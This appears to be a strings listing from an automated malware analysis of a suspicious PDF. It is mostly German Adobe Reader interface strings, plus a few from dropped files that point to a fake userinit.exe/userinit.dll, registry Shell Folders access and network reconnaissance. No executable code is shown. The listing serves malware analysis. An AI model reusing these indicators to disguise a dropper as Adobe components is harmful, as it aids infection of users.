r ein Bild.Ein nicht erkannter Token "%s" wurde gefunden.Token-Typ wurde nicht erkannt.Es fehlten Argumente.Es waren zu viele Argumente vorhanden.Ein Operand ist zu gro	AcroRd32.exe
r PDF-Dateianlagen keine Vorschau von Dateien dieses Typs zulassen.%fname% ist keine g	AcroRd32.exe
chten Sie den vorhandenen Ordner "%fname%" und alle darin enthaltenen Dateien ersetzen?Das Portfolio enth	AcroRd32.exe
herung ausgeben: %DDruckkennlinien ausgeben: %DUnterfarbreduktion ausgeben: %D	AcroRd32.exe
enArti&kel lesen $PAGE_LABEL$ ($PAGE_NUM$ von $NUM_PAGES$)In diesem Dokument ist keine Seite mit der Nummer "%s" vorhanden. Keiner1, 2, 3, ...i, ii, iii, ...I, II, III, ...a, b, c, ...A, B, C, ...$PREFIX$$SAMPLE1$, $PREFIX$$SAMPLE2$, $PREFIX$$SAMPLE3$, ...Speichern unterKopie speichern...Speichern&Seiten&Druckproduktion&ZieleNameSeiteAdobe im World Wide Web besuchen&Registrierung...Acrobat im Internet registrieren&Gehe zu LesezeichenSeite(n) &druckenLesezeichen &l	AcroRd32.exe
glich.Einige Daten in der eingebetteten Schrift "%s" sind ung	AcroRd32.exe
%filename%	AcroRd32.exe
ltiger nummerierter Wert: %sAdobe-Schriftinformationen konnten nicht gefunden werden. Pr	AcroRd32.exe
ltige Anzahl von Argumenten eines setcolor-Operators.Unbekannter ColorSpace "%s".ColorSpace "%s" konnte nicht gefunden werden.Unzul	AcroRd32.exe
nnen.%s m	AcroRd32.exe
gung gestellte Nummer und bei "Andere Konferenznummer" geben Sie eine Konferenznummer eines anderen Anbieters ein.%s kann die aktuelle Verbindungsgeschwindigkeit f	AcroRd32.exe
ffnen Sie es erneut, um das Meeting fortzusetzen.SystemfehlerEin Systemfehler ist aufgetreten. Wir wurden benachrichtigt. %sError Code: %sM	AcroRd32.exe
r Ausgabevorschau anwenden: %DMaximale JPEG 2000-Bildaufl	AcroRd32.exe
nderungen an "%s" speichern, bevor das Formular in Adobe LiveCycle Designer ausf	AcroRd32.exe
ssen Sie es erneut indizieren.Fehler beim Abrufen des TextsOberstes DokumentIm Ordner...Mit Index(en)...Neu sortierenOrdnerNicht sortiertSeite %d	AcroRd32.exe
r OneOfChild %s;%1 ist kein g	AcroRd32.exe
gen-Operation: %1 kann kein untergeordnetes Element von %2 haben.Attribut %1 darf nicht aktualisiert werden.Attribut nicht gefundenNamenloser Knoten der Klasse "%s" kann in einem SOM-Ausdruck nicht verwendet werden.Ung	AcroRd32.exe
ssen Sie sie manuell senden.PDFDaten%format-Datei wird gesendet.Verfahren - %format-Datei sendenDas Formular selbst wird nicht gespeichert, sondern nur die eingegebenen DatenDas Formular wird verschl	AcroRd32.exe
bersprungen)Datei %n von %m%s Dateien%s konnte der Liste nicht hinzugef	AcroRd32.exe
e: %s Art: %tType 1TrueTypeCIDATCBitmapOpenType CFFOpenType CIDOpenType TTType 3 (Untergruppe)BildattributeGr	AcroRd32.exe
gt sind, klicken Sie auf %OK_BUTTON%.Nehmen Sie Dokumente in die Liste unten aus.	AcroRd32.exe
chten Sie nach dem Dokument suchen?Die FDF-Datei "%s" wurde nicht gefunden. M	AcroRd32.exe
%s\userinit.dll	AdobeArm.tmp, AdobeArm.tmp.dr
hrt werden.%s kann nicht in PDF konvertiert werden. Der Vorgang wird nicht ausgef	AcroRd32.exe
hrt...$FILENAME$ wird optimiert...Datei "%s" ist ein PDF-Portfolio mit mehreren Dateien. Die Dateien im PDF-Portfolio wurden zur Dateienliste hinzugef	AcroRd32.exe
PAGE_END$ von $PAGE_N$$PAGE_ONE$ von $PAGE_N$$PAGE_START$-$PAGE_END$ von $PAGE_N$($PAGE_ONE$ von $PAGE_N$)EingabetasteTabulatortasteEscEntfBild-auf-TasteBild-ab-TasteWo befindet sich die "%s"-Hilfedatei?Einzelne SeiteEinzelne Seite, fortlaufendZwei Seiten, fortlaufendKlicken Sie mit der Maus, um Seiten nebeneinander anzuzeigen und fortlaufend durch das Dokument zu bl	AcroRd32.exe
lt bereits eine Datei mit Namen "%fname%".	AcroRd32.exe
ckruffunktion abgebrochen."%s" konnte nicht eingebettet werden.Schriften werden eingebettet.Im Dokument verwendete Zeichen werden bestimmt.Schrifteinbettung wurde abgebrochen.Der Vorgang konnte nicht ausgef	AcroRd32.exe
hrt werden. Es wird empfohlen, die neuesten Upgrades der Acrobat-Produkte zu installieren. Besuchen Sie unsere Website unter http://www.adobe.com/go/acrobat_deDie Datei "%s" ist gesch	AcroRd32.exe
tzt und kann nicht mit diesem Befehl verwendet werden.Die Datei '%s' ist schreibgesch	AcroRd32.exe
nschaften...%s bearbeiten%s:Deckblatt&Drucken&Aktuelles Dokument druckenAusgew	AcroRd32.exe
r Schriften und Ressourcen: %DAsiatische Schriften herunterladen: %DGesamten Text in Pfade konvertieren: %DAlle Konturen in Pfade konvertieren: %DKomplexe Bereiche zuschneiden: %D	AcroRd32.exe
ltig.Nach diesem Vorgang werden die Sicherheitseinstellungen entfernt.Datei '%s' wurde bereits in die Liste aufgenommen. W	AcroRd32.exe
sselDer Name "%s" ist mit einem f	AcroRd32.exe
ltiges Zeichen: %s gefunden in BarcodeUng	AcroRd32.exe
%s Antwort(en) nicht an QuickBooks gesendet -- Fehler!	AcroRd32.exe
ffnet oder erstellt werden Datei %s existiert nichtDatei darf noch nicht vorhanden sein.Der Datei wurde kein Name zugeordnet.Fehler beim Schreiben der Daten in die DateiFehler bei der Suche einer neuen Position in der DateiEs wurde versucht, eine zum Schreiben ge	AcroRd32.exe
ache%OLK*	AcroRd32.exe, AdobeArm.tmp
%docname%	AcroRd32.exe
ltiger Knotentyp: %sUng	AcroRd32.exe
rfen.Messung %N%BeschriftungEinheitKeinOffenGeschlossenOffen (umgekehrt)Geschlossen (umgekehrt)AbgeflachtRauteRundEckigSchr	AcroRd32.exe
%s Antwort(en)	AcroRd32.exe
fen Sie die Berechtigungseinstellungen, um diesen Vorgang zuzulassen.Acrobat kann die Datei "%s" nicht anh	AcroRd32.exe
llen und unterschreiben: %sAusgabehilfe: %sDokumentzusammenstellung: %sDruck (Hochwertig): %sSeitenentnahme: %sAlle Acrobat-VersionenAcrobat 3.0 und h	AcroRd32.exe
erhalb von Textobjekt.Form vom Typ "%s" wird nicht unterst	AcroRd32.exe
che "%format-Datei speichern" und speichern Sie das %format an einem Ort, den Sie sich leicht merken k	AcroRd32.exe
bernahme der Bildschirmkontrolle wurde durch den Teilnehmer verweigert.Die Kontrolle Ihres Bildschirms wurde von %s	AcroRd32.exe
rter: %sBindung: %sSprache: %sSeite: %sVergr	AcroRd32.exe
ber %s...Info	AcroRd32.exe
gliche Wert wird eingesetzt.Unbenannt"%s" ausw	AcroRd32.exe
ltiges Signatur-Child. Das Signatur-Child wurde entfernt.Fehler beim Laden der Konfigurationsdatei.Konfigurationsdatei nicht gefunden: %s.CoreTechLib: BIBClientInit aufgerufen von %1.CoreTechLib: BIBClientTerminate aufgerufen von %1.CoreTechLib: CoreTechInitParam::%1 = '%2'CoreTechLib: CoolType wird initialisiert.Verfolgt den Prozess des Dokumentimports und der Dokumentwiedergabe Mithilfe von PresentationAgent, FormServer und/oder dem XMLFormular-Modul.Verfolgt den Prozess der Schriftenaufl	AcroRd32.exe
schenDokumentzusammenstellungDokumentStatus Dokumentzusammenstellung: %n von %mSammelmappe%n.pdfPortfolio%n.pdfAufgrund eines von Acrobat gefundenen unbekannten Fehlers wurde keine PDF-Datei erstellt.Es wurde keine PDF-Datei erstellt, weil %s ein nicht unt	AcroRd32.exe
%$%,%4%<%P%	AcroRd32.exe
rbeEigenschaftWertObjektgruppierungObjektdatenObjektgruppierung anzeigenObjektdaten anzeigenMit %d anderen Objekten sind die gleichen Daten verbunden wie mit dem ausgew	AcroRd32.exe
ndern>Titel: %sVerfasser: %sThema: %sStichw	AcroRd32.exe
tKamera startenKamera anhaltenEine Datei hochladen...%s% wird hochgeladenBearbeitung durch Benutzer %sInfo	AcroRd32.exe
gt...%s wird aktualisiert...%s wird konvertiert...%s wird gepr	AcroRd32.exe
schenLin&eale ausblendenNachVor90 Grad im UZS90 Grad gegen UZS180 GradSeiten im QuerformatSeiten im HochformatSeiten jeder AusrichtungNotizeigenschaftenKommentareigenschaftenOptionenKeineUnbenannter Artikel %ld	AcroRd32.exe
gen (%s)QuickBooks hat gemeldet, dass der angegebene Name bereits verwendet wird. (%s)	AcroRd32.exe
chten Sie diese %d Elemente wirklich l	AcroRd32.exe
%s\Windows	AdobeArm.tmp, AdobeArm.tmp.dr
he: %sBenutzerdefiniertBegrenzungsrahmenGerade und unge	AcroRd32.exe
r diese "%s"-Aktion erforderliche Zusatzmodul ist nicht verf	AcroRd32.exe
%EndFont	AcroRd32.exe
!!! Warnung: %fname% ist zu gro	AcroRd32.exe
gliche Sicherheitsprobleme zu vermeiden. Aktivieren Sie diese Funktionen nur, wenn Sie dem Host %s vertrauen.Einige Funktionen wurden deaktiviert, um m	AcroRd32.exe
%s.%02d.lnk	AdobeArm.tmp.dr, userinit.dll.dr
ltigen Dateipfad ein.Die Datei %s existiert nicht. Geben Sie einen g	AcroRd32.exe
er als oder gleich %s sein und kleiner als oder gleich %s sein.	AcroRd32.exe
rt.Interner Fehler im Speicher-Manager.Diese Datei erfordert einen Querverweis-Stream (PDF 1.5)Kein Syntaxfehler.Datei beginnt nicht mit "%PDF-".%%EOF fehlt.Startxref-Adresse wurde nicht gefunden.Wert der startxref-Adresse ist keine Ganzzahl."Xref" fehlt.Xref-Header sollte aus zwei ganzzahligen Werten bestehen.Fehler beim Lesen des xref-Eintrags.Im Vorspann fehlt "<<".Objektmarke hat falsches Format.Objektnamen nicht erkannt.Token-Typ nicht erkannt.Endstream-Anweisung fehlt.Unerwartete Endstream-Anweisung.String ohne Endmarke.String zu lang.Token zu lang.Nicht-hexadezimales Zeichen in einem Hex-String.Unerwarteter Token-Typ.Bildende nicht gefunden.Unerwartetes Dictionary-Ende.Unerwartetes Array-Ende.Fehler beim Lesen des Dictionary.Fehler beim Lesen des Objekts.Dictionary oder Array erwartet.Fehlerhafter Bezug auf Fremdobjekt.Parserstapel wurde beim Lesen des Objekts unterlaufen.Fehler beim Lesen der linearisierten Zeigedaten.Nicht-hexadezimales Zeichen nach # in einem Namen.Ung	AcroRd32.exe
berdrucken=%o OPM=%m ri=%rWAHRFALSCHFarbgeberIsoliert Aussparung Keine Aussparung	AcroRd32.exe
nden nicht richtig in Acrobat angezeigt. Wenden Sie sich an den Ersteller des PDF-Dokuments, um das Problem zu beheben.Falscher Operandentyp - erwartet wurde Typ "%s".Eine Schrift ist nicht im Ressourcen-Dictionary verzeichnet - Helvetica wird verwendet.Das XObject "%s" wurde nicht gefunden.Die Form '%s' wurde nicht gefunden.Unbekanntes XObject vom Typ "%s".Nicht gen	AcroRd32.exe
tzliche Beleuchtung aktivierenWerkze&ugleiste ausblendenWerkzeugleiste &einblendenNeue Ansicht%n%Kommentaransicht%n%Schnittansicht%n%Messanzeige%n%Kamerasicht%n%BenutzerdefiniertKamera%n%&Ansicht erstellenBenutzerdefinierte Ansicht erstellen...Wenn Sie dieses Dialogfeld zuk	AcroRd32.exe
%s\logs\	AdobeArm.tmp, AdobeArm.tmp.dr
Um dieses Problem zu vermeiden, sollten Sie eine Schrift verwenden, die in die Datei eingebettet werden kann, die keine benutzerdefinierte Kodierung aufweist bzw. die auf allen Systemen, auf denen die PDF-Datei angezeigt wird, vorhanden ist.Die dem Feld "%s" zugeordnete Schrift ist nicht verf	AcroRd32.exe
tzt und kann nicht geteilt werden, da das richtige Kennwort nicht eingegeben wurde.Die Datei "%s" ist ein Adobe XML-Formular und kann nicht in mehrere Dokumente geteilt werden.Die Datei "%s" ist ein zertifiziertes Dokument und kann nicht in mehrere Dokumente geteilt werden.Die Datei "%s" wurde nicht geteilt, da das Dokument nur $NUM$ oder weniger Seiten enth	AcroRd32.exe
teeinheit angegeben [%1].Fehler bei Wiedergabe von Bibliotheks-Handle: %sNode hat kein entsprechendes Layout-Peer.Ung	AcroRd32.exe
gbar. Einige Zeichen werden u. U. nicht korrekt angezeigt bzw. gedruckt.Die aktuelle Darstellung von Feld "%s" kann nicht bearbeitet werden, da die zugeordnete Schrift nicht verf	AcroRd32.exe
e Benutzer freigeben.%user% zeigt die freigegebene Seite an.	AcroRd32.exe
%olddeadline%	AcroRd32.exe
r Chat und Anzeigen von freigegebenen Seiten sind Updates auf %server% verf	AcroRd32.exe
r Option: %sOption ist ung	AcroRd32.exe
gen (%s)Einf	AcroRd32.exe
Sollen PDF-Dateien mit %ThisApp% statt mit %OtherApp% ge	AcroRd32.exe
rfen.Acrobat kann die Dateianlage "%s" nicht	AcroRd32.exe
gt sind, klicken Sie auf %OK_BUTTON%.Mehrere Dateien exportierenNehmen Sie die zu exportierenden Dokumente in die Liste unten auf.	AcroRd32.exe
%PDF-1.4	Bin Laden s successor.pdf.dr
ffnen.Dieses Dokument hat %d Dateianlagen. Auf der Registerkarte "Anlagen" k	AcroRd32.exe
r:Suche abgeschlossen nach:Suche abgeschlossen in:Suche abgeschlossen in:%searchterm% in %location%%numdocuments% Dokument(e) mit %numhits% Treffer(n)Gefundene Dokumente:Gesamtzahl der Fundstellen:...Dateipfade ausblendenSuchergebnisse m	AcroRd32.exe
%serverName%	AcroRd32.exe
sselungsebene: %sDokumentkennwort: %sVerfasserkennwort: %sDrucken: %s%s wird gespeichertDokument	AcroRd32.exe
L%L'LcLqL	AcroRd32.exe
ngen Sie die gespeicherte %format-Datei an die E-Mail an und senden Sie die Nachricht.An:Betreff:Nachricht:Im Anhang dieser E-Mail befindet sich eine %format-Datei.Hinweis:%format	AcroRd32.exe
erung: %sSeitenlayout: %sSeitenmodus: %sNur SeiteLesezeichen und SeiteAnlagen und SeiteSeitenbilder und SeiteEbenen und SeiteFenster an erste Seite anpassen: %sFenster auf Bildschirm zentrieren: %sIm Vollbildmodus	AcroRd32.exe
#%EDYX	AcroRd32.exe
er ist.Die Datei "%s" wurde nicht geteilt, da das Dokument keine	AcroRd32.exe
%location%	AcroRd32.exe
hlen:<Keine><Letzte nicht gespeicherte>%s% ist ein Adobe-XML-Formular. Um Adobe-XML-Formulare anderen PDF-Dateien hinzuzuf	AcroRd32.exe
ffnet werden.Acrobat konnte die an den angegebenen Speicherort zu sendende Datei nicht speichern.Beim Senden ist ein Fehler aufgetreten. %sERROR%Die Antwort kann aufgrund eines unbekannten Inhaltstyps nicht verarbeitet werden.Inhalt des Typs %sCONT_TYPE% kann nicht verarbeitet werden.Unbekannter Fehler.Die Netzwerkverbindung wurde abgebrochen.Das Zeitlimit f	AcroRd32.exe
chten Sie die erfassten Daten mit Namen "%formname%" wirklich aus Tracker entfernen?M	AcroRd32.exe
t</h3><p>Standard: %STD%<br />ISO-Name: %ISO%<br />Status: <span style="color:#0000FF">	AcroRd32.exe
r Stream-Datei nicht geladenSystemfehler: %sImplementierung von Stream-Datei nicht verf	AcroRd32.exe
%systemroot%\Registration	AcroRd32.exe
berdrucken: %DFarbe: %DEinstellungen f	AcroRd32.exe
digt.Die Schrift "%s" kann mit der installierten ATM-Version nicht angezeigt werden.Die Datei hat keine Seiten und kann daher nicht ge	AcroRd32.exe
gt.Datei "%s" ist ein PDF-Portfolio ohne Dateien. Es wurden keine Dateien dieses Portfolios zur Dateienliste hinzugef	AcroRd32.exe
%server_name%	AcroRd32.exe
ffnet werden. Entfernen Sie die Datei aus der Liste.Es wurde keine PDF-Datei erstellt, da %s einen unbekannten Fehler verursacht hat. Entfernen Sie die Datei aus der Liste und versuchen Sie es erneut.Es wurde keine PDF-Datei erstellt, da %s nicht vorhanden ist. Entfernen Sie die Datei aus der Liste und versuchen Sie es erneut.Datei %s konnte nicht konvertiert werden, da sie nicht vorhanden ist.Es wurde keine PDF-Datei erstellt, da "%s" kein von Acrobat unterst	AcroRd32.exe
ssiger Vorgang ("%s") au	AcroRd32.exe
%-8s%s	AdobeArm.tmp.dr, userinit.dll.dr
nderungen an "%s" speichern, bevor das Formular in Adobe LiveCycle Designer bearbeitet wird?Formular in Adobe LiveCycle Designer ausf	AcroRd32.exe
gen. (%s)F	AcroRd32.exe
ndern: %sKopieren von Inhalt: %sAnmerkungen oder Formularfelder hinzuf	AcroRd32.exe
gt.&Auf alle Dateien anwendenDer Ordner "%fname%" kann nicht erstellt werden. "%fname%" ist ein ung	AcroRd32.exe
nge ign&orierenUnbekannte Art von Ziel "%s".Das f	AcroRd32.exe
hlten %s Dateien wirklich l	AcroRd32.exe
%-24s%-16s%-16s%-8s%s	AdobeArm.tmp.dr, userinit.dll.dr
tzt.Software-FehlerOperation "%s" wird nicht unterst	AcroRd32.exe
version %d.%d %s(Build %d)	AdobeArm.tmp.dr, userinit.dll.dr
r /BBox fehlerhaft.In der Schrift "%s" ist der Wert f	AcroRd32.exe
%s\userinit.exe	AdobeArm.tmp, AdobeArm.tmp.dr
bertragen werden.Fehler beim Lesen/Abrufen der Daten von '%s'.Fehler beim Schreiben/Ablegen der Daten in '%s'.SSL-Zertifikatsproblem mit Zertifikat f	AcroRd32.exe
ngigen Felder aufheben?SeiteFeldfenster-Werkzeugleiste&Tab-Nummern anzeigen%s Bold Italic%s Bold%s Italic%sFettKursivUnterstrichenDurchgestrichenRotBlauGr	AcroRd32.exe
ber diese Anwendung hinaus weitergegeben.Nach &rechts drehenKlicken Sie mit der Maus, um das Bild in Schritten von 90 Grad nach rechts zu drehen.Klicken Sie mit der Maus, um das Bild in Schritten von 90 Grad nach links zu drehen.&Startseite&EigenschaftenDer Wert muss zwischen %s und %s liegen.Ung	AcroRd32.exe
ngig: 3D-Kommentar bearbeiten&Wiederherstellen: 3D-Kommentar bearbeiten3D-Kommentar3D-Kommentaransicht3D-Kommentareigenschaften3D-Kommentar%n%3D-Kommentaransicht%n%Alle 3D-PMIAnsichtenBezugspunkteGeometrische ToleranzenMa	AcroRd32.exe
chten, klicken Sie auf "Neu starten".Die Verbindung wurde abgebrochen.Sie befinden sich seit %s Minuten allein in diesem Meetingraum. Die Verbindung wird in %s Sekunden abgebrochen. Klicken Sie auf die Schaltfl	AcroRd32.exe
chten Sie fortfahren?Die Datei "%s" besteht bereits. M	AcroRd32.exe
r den Sicherheits-Handler "%s" erforderliche Zusatzmodul nicht verf	AcroRd32.exe
hltes Wort nachschlagen"%s" nach&schlagen&Mehrere MonitoreEine erforderliche Ressource konnte nicht geladen werden.DiensteAcrobat ausblendenAdobe Reader ausblendenAndere ausblendenAlle einblendenMinimierenAlle Fenster minimierenZoomAlle in den Vordergrund&TeilungTabellenteil&ung&Diese Schaltfl	AcroRd32.exe
ssel "%s".Der erweiterte Grafik-Status mit dem Namen "%s" konnte nicht gefunden werden.Ung	AcroRd32.exe
f%DDDDz	AcroRd32.exe
ber %sHilfe zu %sMeeting beenden...%s beend	AcroRd32.exe
ndige Seiten&Papiermodus&Dokumenteigenschaften...PDF-Datei in einem anderen Format speichernE&xportieren&Mehrere Dateien exportieren...Word-DokumentRTF (Rich Text Format)HTML-WebseiteHTML 4.01 mit CSS 1.0HTML 3.2Adobe PDF im XML-FormatAdobe PDF im XML-Format mit SVGXML 1.0JPEGJPEG2000PNGTIFFText (normal)Encapsulated PostScriptPostScriptPDF/XPDF/A&HTMLXML&Bild&PostScript&TextWeitere FormateKopierenEs gibt bereits ein Element "%filename%" an diesem Speicherort. S	AcroRd32.exe
r OneOfChild %s;Ung	AcroRd32.exe
ter erneut.Die Verbindung wurde abgebrochen. Dieses Dokument kann erst freigegeben werden, wenn die Verbindung wiederhergestellt ist.AdobeBRIO Betahttp://labs.adobe.comHomepage %s besuchen24 Stunden (Beispiel: 13:04)	AcroRd32.exe
(%s) %s	cmd.exe
ge aus der Liste klicken Sie auf "Alle entfernen".Feld kopierenAuf welche Seiten soll dieses Feld kopiert werden?Alle&Von:&bis:von %sDaten aus mehreren Formularen exportieren&Dateien hinzuf	AcroRd32.exe
%foldername%	AcroRd32.exe
%EndFon	AcroRd32.exe
gend Speicher. Text mit der Schrift "%s" wird m	AcroRd32.exe
hlte Dokumente dru&ckenAlle Dokumente druc&kenIn PDF konvertierenErfolgreich in "%s" konvertiertFehler beim KonvertierenIn Flash-Movie konvertierenDas ausgew	AcroRd32.exe
lt bereits einen Ordner mit Namen "%fname%".Sie haben eine Datei ausgew	AcroRd32.exe
hlte PDF-DateienBeibehaltenKonvertierenIn Alternative konvertieren%SPOTNAME zuordnenDekalibrierenBildTextVektorgrafikSchattierung gl	AcroRd32.exe
gen Sie sie in Ihren Browser ein, oder wenden Sie sich an den Systemadministrator.Beim Laden des Navigators aus Verzeichnis '%s':	AcroRd32.exe
r das XObject "%s".Ung	AcroRd32.exe
dt alle aktuellen Benutzer zur Teilnahme ein.Sie wurden eingeladen, den Bildschirm dieses Benutzers auf Acrobat.com anzuzeigen: %user%Bildschirm anzeigen&Chat speichern&Chat speichern...M	AcroRd32.exe
%s\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	AdobeArm.tmp.dr, userinit.dll.dr
Broadcast address: %s	AdobeArm.tmp.dr, userinit.dll.dr
(%EDYX	AcroRd32.exe
tztes PNG-Format.Fehler beim Umwandeln des Bilds. Bildpuffer nicht zugeordnet.Fehler beim Lesen der BMP-Datei : %sFehler beim Lesen der JPEG-Datei : %sSOI-Markierung fehlt.JFIF APP0-Markierung fehlt.Keine JFIF-Datei.DHP-Markierung nicht unterst	AcroRd32.exe
digt ist (z. B. wenn sie als E-Mail-Anhang geschickt und nicht korrekt dekodiert wurde).Acrobat konnte "%s" nicht	AcroRd32.exe
hlungszeichenFarbeKursivUnterstrichen%s Version:%s m	AcroRd32.exe
%FWfgr	AcroRd32.exe
%F#Ei`HY!!!-,	AcroRd32.exe
nn nicht in mehrere Dokumente geteilt werden, da es sich um ein PDF-Portfolio ohne Dateien handelt.Die Datei "%s" kann nicht in mehrere Dokumente geteilt werden, da es sich um ein PDF-Portfolio ohne Dateien handelt.Dieses Dokument enth	AcroRd32.exe
gt.Datei "%s" ist eine AutoCAD Sheet Set-Datei (DST) mit mehreren verkn	AcroRd32.exe
gen: %sSpeicherort: Nach %sSpeicherort: Vor %sSeite $PAGENUM$Alle Seitenminiaturen einbettenEingebettete Seitenpiktogramme entfernenBeschreibungErweitertPDF/X-InformationOptionen zum	AcroRd32.exe
bergeordnetes DokumentZielname: %sFeste WerteWerte	AcroRd32.exe
%sFilename%	AcroRd32.exe
%ILsvl	AcroRd32.exe
ssen das %sPACKAGE% installieren, um diese Aktion in diesem Formular auszuf	AcroRd32.exe
%OLE32.DLL	AcroRd32.exe
%$%,%4%<%l%	AcroRd32.exe
tzliche QuickBooks-Konfiguration, Lizenzierung, Abonnements oder Upgrades erforderlich. (%s)QuickBooks hat einen Konvertierungsfehler gemeldet. Wenn Sie dieses Formular erstellt haben, m	AcroRd32.exe
tigen...Das aktuell angezeigte PDF-Dokument entspricht nach eigenen Angaben dem Standard %STD% (%ISO%).Das aktuell angezeigte PDF-Dokument enth	AcroRd32.exe
tzt wird. Es wird empfohlen, dass Sie die neueste Version verwenden. Diese finden Sie auf der Website http://www.adobe.com/go/acrobat_deDer/die folgende(n) Navigator(en) aus Verzeichnis '%s' konnten nicht geladen werden, da sie anscheinend ein neues Format verwenden, das von dieser Acrobat-Version nicht unterst	AcroRd32.exe
r QuickInfoInhalt&InhaltGesamten Inhalt der Hilfe einblenden IndexGesamten Hilfeindex einblenden Hilfe zur Suche in PDF-DateienKontext-&Websuche nach:- %sAlleThemen mit folgendem Inhalt suchen:&SuchenW	AcroRd32.exe
r dieses Dokument. Importieren?%fdfname% enth	AcroRd32.exe
tzten Datei verliert die Sicherheitseinstellungen.Trotzdem fortfahren?Dieses Dokument wurde erfolgreich in $NUM$ Dokumente geteilt.%M% von %N% Dokumenten wurden erfolgreich geteilt.Die Datei "%s%" ist gesch	AcroRd32.exe
chten Sie "%s" wirklich l	AcroRd32.exe
%cDeadline%	AcroRd32.exe
tzt markiert werden soll.OptionenLinksRechtsLinks nach rechtsRechts nach linksZentrierenDieser Standardwert entspricht nicht dem angegebenen Format (%s). Geben Sie einen dem Format entsprechenden Standardwert ein, oder	AcroRd32.exe
gen von Seiten in das Dokument ist ein Fehler aufgetreten.Daten werden geladen ...Anmelden als %user%Fenster %pane%	AcroRd32.exe
ffnen%DOCS% Dokumente mit %HITS% Treffern%DOCS%-Dokument mit %HITS% Treffern gefundenSuchenKlicken Sie auf "	AcroRd32.exe
Subnet mask: %s	AdobeArm.tmp.dr, userinit.dll.dr
cke markierenDokument mit %numhits% Treffern%1 Dateien wurden	AcroRd32.exe
. Die Datei wurde nur teilweise angezeigt.Die Dateianlage "%fname%" kann nicht in der Vorschau angezeigt werden, da die Einstellungen f	AcroRd32.exe
!!Uh%D	AcroRd32.exe
ndiges Dokument.unerwarteter Analysestatus - Fehlerbericht sendenXSLT-Analysefehler %1: %2%sOperation ist w	AcroRd32.exe
zeilentextes immer gleich beim Drucken auf unterschiedlichen SeitenformatenFKUFarbeVorschau&Seitenansichtvon %nBates-Nummerierung - OptionenA&nzahl der Ziffern:S&tartnummer:&Pr	AcroRd32.exe
ngen".%s% ist ein zertifiziertes Dokument. Um zertifizierte Dokumente anderen PDF-Dateien hinzuzuf	AcroRd32.exe
Um ein Adobe PDF-Dokument zu erstellen, wechseln Sie zur Ausgangsanwendung. Geben Sie das Dokument dann als Adobe PDF-Dokument aus.Acrobat konnte "%s" nicht	AcroRd32.exe
gt werden.Datei "%s" enth	AcroRd32.exe
%s %s	cmd.exe
r '%s'. Antragstellername stimmt nicht mit Ziel-Host-Namen	AcroRd32.exe
%%%%E+	AcroRd32.exe
hlen Sie diese Option, wenn Sie derzeit ein E-Mail-Programm wie z. B. KMail, Evolution, Mozilla, Mutt, Netscape, Pine oder einen anderen E-Mail-Systemclient verwenden.%s Antwort(en) an QuickBooks gesendet.	AcroRd32.exe
leiste ausblenden: %sWerkzeugleiste ausblenden: %sFenstersteuerelemente ausblenden: %sLesezeichen-Fenster und SeiteSeiten-Fenster und SeiteEbenen-Fenster und SeiteAnlagen-Fenster und SeiteDateinameDokumenttitelSicherheitssystem: %sVerschl	AcroRd32.exe
ngen.Dieses Dokument hat 1 Dateianlage.Dieses Dokument hat %d Dateianlagen.Dieses Dokument hat 1 Dateianlage. Auf der Registerkarte "Anlagen" k	AcroRd32.exe
r verborgenen TextSeite:Zoom:VorschauoptionenVerborgener TextNur verborgenen Text anzeigenNur sichtbaren Text anzeigenSichtbaren und verborgenen Text anzeigenAusgeblendeter Text auf Seite %p:Seiteninformationen (Seite	AcroRd32.exe
hlt. %M% von %N% PDF-Dateien haben eine Bates-Nummer erhalten. Bei %M% von %N% PDF-Dateien wurde die Bates-Nummer gel	AcroRd32.exe
gbar. Wenden Sie sich an den Verfasser, um die Originalversion dieses Dokuments zu erhalten.Mit diesem Dokument werden Reader-Funktionen aktiviert, die in dieser Reader-Version nicht mehr aktiviert sind.Antwort %count%%count% Antworten1 Antwort&Formatierung l	AcroRd32.exe
In Ihrem Dokument wird Seite %pagenum% angezeigt.freigegebene Seite %pagenum%.Aktuell freigegebene Seite %pagenum%.Feedback senden...Dokumentfreigabe ist nun aktiviertDieser Vorgang kann nur mit einer g	AcroRd32.exe
ckgegeben.Unbekannte Var '%s'.Versuch zum Erstellen einer Var im XDC-Modell fehlgeschlagen. Das Namensattribut war leer oder nicht angegeben.%0-Informationen konnten nicht gesammelt werden; auf den %1-Dienst kann nicht zugegriffen werden.Eine direkte Schriftzuordnung ist fehlgeschlagen. Die Schrift %1 konnte nicht in der XDC-Datei gefunden werden.%0 konnte der Wert %1 nicht zugewiesen werden; %2.%0 ist kein g	AcroRd32.exe
r Eigenschaft; %1 hat keine Standardeigenschaft%1 hat keine Methode "%2"%1 hat keine StandardmethodeFalsche Anzahl Parameter beim Aufrufen der Methode "%s"Unterschiedliche Argumente im Eigenschaft- oder FunktionsargumentFehler beim Versuch, einen Knoten hinzuzuf	AcroRd32.exe
r /Flags fehlerhaft.In der Schrift "%s" ist der Wert f	AcroRd32.exe
Warnung: %fname% ist zu gro	AcroRd32.exe
ffnet haben (Seite %pagenum%).Wenn Sie beim Anzeigen freigegebener Seiten teilnehmen, wird Seite %pagenum% Ihres Dokuments angezeigt.	AcroRd32.exe
ltiger Wert: muss kleiner als oder gleich %s sein.	AcroRd32.exe
bernehmen.%s m	AcroRd32.exe
ffnet, das den Multimediainhalt %p enth	AcroRd32.exe
fen...</a></p><p>Gefunden:%TRAPPED%</p><h3>Ausgabebedingung</h3><p>Kennung: %ID%<br />Info: %INFO%</p><hr/><p><a href="open_preflight">	AcroRd32.exe
en.und %d andere DateienSchlie	AcroRd32.exe
%deadline_msg%	AcroRd32.exe
hrt werden, da "%filename%" gerade verwendet wird.NieImmerNur bei PDF/A-DokumentenXObject-Anzeigemodus referenzierenNieImmerNur PDF/X-5-kompatible&Referenzziele f	AcroRd32.exe
berdruck beibehalten: %DSchnittmarken: %DZuschneidemarken: %DBeschnittzugabemarken: %DPasskreuze: %DSeiteninformationen: %DFarbkontrollstreifen: %DMarkenstil: %D	AcroRd32.exe
gen?Kompilieren der DokumentressourcenKompilieren der SeitenressourcenHerunterladen der SchriftHerunterladen der RessourceHerunterladen des Farbbereich-ArraysHerunterladen der FarbbereichsbibliothekHerunterladen des FarbverlaufsDrucken des BildesHerunterladen des BildesDrucken der SeitenseparationHerunterladen der SeitenseparationHerunterladen des ProcsetsFertigstellen des DokumentsFertigstellen der SeiteSpeichern von SeitenelementenDrucken von SeitenelementenHerunterladen des Bildes zu %percent% abgeschlossenKeine zum Drucken ausgew	AcroRd32.exe
